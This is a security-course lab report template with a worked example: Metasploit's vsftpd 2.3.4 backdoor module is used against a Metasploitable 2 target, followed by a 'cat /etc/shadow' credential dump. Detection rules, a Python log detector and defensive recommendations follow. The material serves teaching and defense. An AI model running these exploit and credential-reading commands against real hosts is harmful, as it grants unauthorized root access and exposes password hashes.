LAB REPORT TEMPLATE
Apophis Networking Security Lab
Student Name: ___________________________
Module Number: ___________________________
Lab Title: ___________________________
Date Submitted: ___________________________
1. EXECUTIVE SUMMARY (1 paragraph)
Provide a high-level overview of the lab objectives, key findings, and outcomes. This should be understandable by non-technical stakeholders.
Example:
This lab focused on exploiting the vsftpd 2.3.4 backdoor vulnerability (CVE-2011-2523) on a Metasploitable 2 target system. The exploitation was successful, resulting in root-level access to the target. Post-exploitation activities included credential harvesting and persistence establishment. This exercise demonstrated the critical importance of patch management and network segmentation in preventing unauthorized access.
2. OBJECTIVES
List the specific learning objectives for this lab.
Example:
- Configure and execute Metasploit Framework exploits
- Understand the mechanics of reverse shell payloads
- Perform post-exploitation enumeration
- Document exploitation chains for penetration testing reports
3. TOOLS & ENVIRONMENT
3.1 Attack Platform
- OS: Kali Linux 2024.1
- IP Address: 10.10.2.50
- Tools Used:
- Metasploit Framework v6.3.x
- Nmap 7.94
- Wireshark 4.0.x
3.2 Target System
- OS: Metasploitable 2 (Ubuntu 8.04)
- IP Address: 10.10.4.10
- Vulnerable Services:
- vsftpd 2.3.4 (Port 21)
- OpenSSH 4.7p1 (Port 22)
- Apache 2.2.8 (Port 80)
3.3 Network Topology
[Kali Linux] <---> [pfSense Firewall] <---> [Metasploitable 2]
10.10.2.50         10.10.2.1 | 10.10.4.1     10.10.4.10
VLAN 200 (Red Team)                          VLAN 400 (Victim Network)
4. METHODOLOGY
Describe the step-by-step process followed during the lab. Use numbered steps and include relevant commands.
4.1 Pre-Exploitation: Reconnaissance
Step 1: Host Discovery
nmap -sn 10.10.4.0/24
Output:
Nmap scan report for 10.10.4.10
Host is up (0.00042s latency).
Step 2: Port Scanning
sudo nmap -sS -sV -p- 10.10.4.10 -oA full_scan
Output:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1
...
Analysis: vsftpd 2.3.4 identified; this version is known to contain a backdoor (CVE-2011-2523).
4.2 Exploitation
Step 3: Launch Metasploit
msfconsole -q
Step 4: Select Exploit Module
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.4.10
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
Output:
[*] 10.10.4.10:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.4.10:6200 - Shell command shell session 1 opened
Result: Successful exploitation. Root shell obtained.
4.3 Post-Exploitation
Step 5: Verify Access
id
Output:
uid=0(root) gid=0(root)
Step 6: Credential Harvesting
cat /etc/shadow
Output: (Include first 3 lines only for report)
root:$1$XjpI2OBz$...:0:0:root:/root:/bin/bash
daemon:*:14684:0:99999:7:::
...
5. FINDINGS & ANALYSIS
5.1 Key Discoveries
Vulnerability Identified:
- CVE: CVE-2011-2523
- Severity: Critical (CVSS 10.0)
- Description: vsftpd 2.3.4 contains malicious backdoor code that opens shell access on port 6200 when the FTP username contains a smiley face (":)").
- Exploitability: Trivial; no authentication required.
Impact Assessment:
- Confidentiality: HIGH—Full read access to all files including /etc/shadow
- Integrity: HIGH—Root access allows file modification
- Availability: HIGH—Attacker could delete files or crash system
5.2 Network Traffic Analysis
Wireshark Observations:
- TCP stream 1: FTP connection (port 21) with malicious username
- TCP stream 2: Shell session on port 6200
- No encryption—all commands visible in plaintext
Screenshot: [Include Wireshark screenshot showing backdoor traffic]
6. INDICATORS OF COMPROMISE (IOCs)
| Type | Value | Description |
|---|---|---|
| IP Address | 10.10.2.50 | Attacker source IP |
| Port | 6200 | vsftpd backdoor listening port |
| Process | vsftpd | Spawned root shell (suspicious parent) |
| Network | TCP SYN to 6200 | Connection to non-standard FTP port |
7. DEFENSIVE RECOMMENDATIONS
7.1 Immediate Actions
- Patch vsftpd: Upgrade to version 3.0.5 or disable service if not needed
- Network Segmentation: Block victim network from initiating connections to Red Team VLAN
- IDS Rule: Deploy Suricata signature for port 6200 connections
7.2 Long-Term Improvements
- Vulnerability Management: Implement automated scanning (weekly)
- Patch Management: Establish SLA for critical patches (24-48 hours)
- Firewall Rules: Default-deny egress from victim network
- Security Monitoring: Alert on connections to non-standard ports
8. DETECTION ENGINEERING
8.1 Suricata Rule
alert tcp any any -> any 6200 (msg:"vsftpd 2.3.4 Backdoor Connection"; flow:established,to_server; sid:1000050; rev:1;)
8.2 Security Onion Query (KQL)
destination.port: 6200 AND event.module: "suricata"
8.3 MITRE ATT&CK Mapping
- Tactic: Initial Access (TA0001)
- Technique: T1190 - Exploit Public-Facing Application
- Sub-Technique: FTP Service Exploitation
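The detection described in sections 5.2, 6 and 8 can be worked through in code: read Suricata EVE records, flag an FTP USER command carrying the ":)" trigger on port 21, flag any TCP flow to port 6200, and raise the severity when the same source does both within a short window. This is an added example, not code from the lab report template or from the Suricata or Security Onion projects. It assumes Suricata's eve.json output (event types "ftp" and "flow" with src_ip, dest_ip, dest_port, proto, ftp.command and ftp.command_data fields); the log records embedded below are constructed for the example, not captured from the lab.

```python
"""Detection logic over Suricata EVE JSON for the vsftpd 2.3.4 backdoor pattern.

Added example, not part of the lab report template. Assumes Suricata eve.json
records of event_type "ftp" and "flow"; the sample lines are constructed.
"""
import json
from datetime import datetime, timedelta

FTP_PORT = 21            # control channel where the trigger username is sent
BACKDOOR_PORT = 6200     # port on which vsftpd 2.3.4 spawns the backdoor shell
TRIGGER = ":)"           # substring in the FTP username that opens the backdoor
CORRELATION_WINDOW = timedelta(minutes=5)
TECHNIQUE = "T1190"      # MITRE ATT&CK: Exploit Public-Facing Application

# Constructed sample records (field names follow Suricata's EVE schema; the
# values are invented for this example, not taken from a real capture).
SAMPLE_EVE_LINES = [
    '{"timestamp":"2024-03-01T10:00:01.000000+0000","event_type":"ftp","src_ip":"10.10.2.50","src_port":41234,"dest_ip":"10.10.4.10","dest_port":21,"proto":"TCP","ftp":{"command":"USER","command_data":"anonymous"}}',
    '{"timestamp":"2024-03-01T10:00:02.000000+0000","event_type":"ftp","src_ip":"10.10.2.50","src_port":41236,"dest_ip":"10.10.4.10","dest_port":21,"proto":"TCP","ftp":{"command":"USER","command_data":"hello:)"}}',
    '{"timestamp":"2024-03-01T10:00:03.000000+0000","event_type":"flow","src_ip":"10.10.2.50","src_port":41238,"dest_ip":"10.10.4.10","dest_port":6200,"proto":"TCP","flow":{"state":"established"}}',
    '{"timestamp":"2024-03-01T10:05:00.000000+0000","event_type":"flow","src_ip":"10.10.4.10","src_port":53000,"dest_ip":"10.10.4.1","dest_port":53,"proto":"UDP","flow":{"state":"established"}}',
    '{"timestamp":"2024-03-01T10:06:00.000000+0000","event_type":"flow","src_ip":"10.10.2.77","src_port":50000,"dest_ip":"10.10.4.10","dest_port":6200,"proto":"TCP","flow":{"state":"new"}}',
]


def parse_eve(lines):
    """Parse EVE JSON lines into dicts carrying a parsed '_ts' datetime.

    Malformed lines (bad JSON, missing or unparsable timestamp) are skipped so
    that one corrupt record does not abort a whole log run.
    """
    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
            ev["_ts"] = datetime.strptime(ev["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z")
        except (ValueError, KeyError, TypeError):
            continue
        events.append(ev)
    return events


def detect(lines):
    """Return findings for trigger usernames, flows to 6200, and their correlation."""
    events = sorted(parse_eve(lines), key=lambda e: e["_ts"])
    findings = []
    trigger_times = {}  # src_ip -> time of the most recent trigger username seen
    for ev in events:
        etype = ev.get("event_type")
        src, dst, dport = ev.get("src_ip"), ev.get("dest_ip"), ev.get("dest_port")
        if etype == "ftp" and dport == FTP_PORT:
            ftp = ev.get("ftp", {})
            if ftp.get("command") == "USER" and TRIGGER in ftp.get("command_data", ""):
                trigger_times[src] = ev["_ts"]
                findings.append({
                    "severity": "high", "technique": TECHNIQUE,
                    "src_ip": src, "dest_ip": dst, "dest_port": dport,
                    "reason": "FTP USER command contains the vsftpd 2.3.4 backdoor trigger",
                })
        elif etype == "flow" and ev.get("proto") == "TCP" and dport == BACKDOOR_PORT:
            last = trigger_times.get(src)
            correlated = last is not None and ev["_ts"] - last <= CORRELATION_WINDOW
            findings.append({
                "severity": "critical" if correlated else "medium",
                "technique": TECHNIQUE,
                "src_ip": src, "dest_ip": dst, "dest_port": dport,
                "reason": ("backdoor shell session on 6200 following a trigger username"
                           if correlated else
                           "TCP flow to non-standard port 6200 (vsftpd backdoor IOC)"),
            })
    return findings


def attacker_ips(findings, min_severity="high"):
    """Source IPs worth adding to the IOC table, filtered by minimum severity."""
    rank = {"medium": 1, "high": 2, "critical": 3}
    return sorted({f["src_ip"] for f in findings
                   if rank[f["severity"]] >= rank[min_severity]})


if __name__ == "__main__":
    for f in detect(SAMPLE_EVE_LINES):
        print(f"[{f['severity']:<8}] {f['technique']} {f['src_ip']} -> "
              f"{f['dest_ip']}:{f['dest_port']}  {f['reason']}")
    print("IOC source IPs:", attacker_ips(detect(SAMPLE_EVE_LINES), "medium"))
```

On the sample records this yields three findings: a high-severity trigger username from 10.10.2.50, a critical correlated 6200 session from the same source one second later, and a medium-severity uncorrelated 6200 flow from 10.10.2.77. The medium hit is the "non-standard port" alert recommended in 7.2 and is what the Suricata rule in 8.1 fires on by itself; correlating it with the trigger username on the FTP control channel is what turns a port-based IOC into evidence of the actual exploit, which is also why the plaintext FTP traffic noted in 5.2 matters for forensics.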
9. CHALLENGES & TROUBLESHOOTING
Challenge 1: Initial exploit failed with "connection refused"
Root Cause: VLAN tag not set correctly on VM network interface in Proxmox.
Solution:
# Proxmox VM > Hardware > Network Device > Edit
# VLAN Tag: 400 (was blank)
Challenge 2: Wireshark showed no captured packets
Root Cause: Capturing on wrong interface (wlan0 instead of eth0).
Solution:
sudo tcpdump -i eth0 # Verify interface has traffic
sudo wireshark -i eth0
10. LESSONS LEARNED
What Went Well
- Successful identification and exploitation of vulnerability
- Comprehensive documentation with screenshots
- Effective use of network segmentation for safe testing
What Could Be Improved
- Faster troubleshooting (spent 30 minutes on VLAN issue)
- More thorough initial reconnaissance (missed some services)
- Should have taken VM snapshot before exploitation
Key Takeaways
- Offensive Perspective: Outdated software is trivially exploitable; attackers have automated scanners for this.
- Defensive Perspective: One unpatched service can compromise the entire network. Defense-in-depth is critical.
- Forensics Importance: Without a packet capture, proving the attack vector would be difficult in an IR scenario.
11. APPENDICES
Appendix A: Command History
# Full command history from Kali terminal
history > command_history.txt
(Attach file: command_history.txt)
Appendix B: Screenshots
- Screenshot 1: Nmap scan results showing vsftpd 2.3.4
- Screenshot 2: Metasploit successful exploitation
- Screenshot 3: Root shell access (id command output)
- Screenshot 4: Wireshark PCAP showing port 6200 connection
- Screenshot 5: Security Onion alert for detection
Appendix C: Packet Capture
(Attach file: exploitation.pcapng)
Appendix D: Metasploit Output Log
(Attach file: msfconsole.log)
12. REFERENCES
- National Vulnerability Database. (2011). CVE-2011-2523. Retrieved from https://nvd.nist.gov/vuln/detail/CVE-2011-2523
- Rapid7. (2024). Metasploit Framework Documentation. Retrieved from https://docs.rapid7.com/metasploit/
- MITRE Corporation. (2024). ATT&CK Framework - T1190. Retrieved from https://attack.mitre.org/techniques/T1190/
- OWASP. (2021). Top 10 Web Application Security Risks. Retrieved from https://owasp.org/Top10/
13. DECLARATION
I certify that this lab report represents my own work and that all tools were used in an authorized, ethical manner within the confines of my personal lab environment. I understand that unauthorized computer access is illegal.
Signature: ___________________________ Date: ___________________________
END OF LAB REPORT
GRADING RUBRIC FOR THIS REPORT
| Section | Points | Criteria |
|---|---|---|
| Executive Summary | 5 | Clear, concise, non-technical language |
| Methodology | 20 | Step-by-step, reproducible, includes commands |
| Findings & Analysis | 20 | Technical depth, vulnerability details, impact |
| Screenshots | 15 | Relevant, annotated, high-quality |
| Detection Engineering | 15 | Custom rules, MITRE mapping, queries |
| Defensive Recommendations | 10 | Actionable, prioritized, realistic |
| Lessons Learned | 5 | Self-reflection, improvement mindset |
| Documentation Quality | 10 | Formatting, grammar, professionalism |
| TOTAL | 100 | |
Minimum Passing Score: 70/100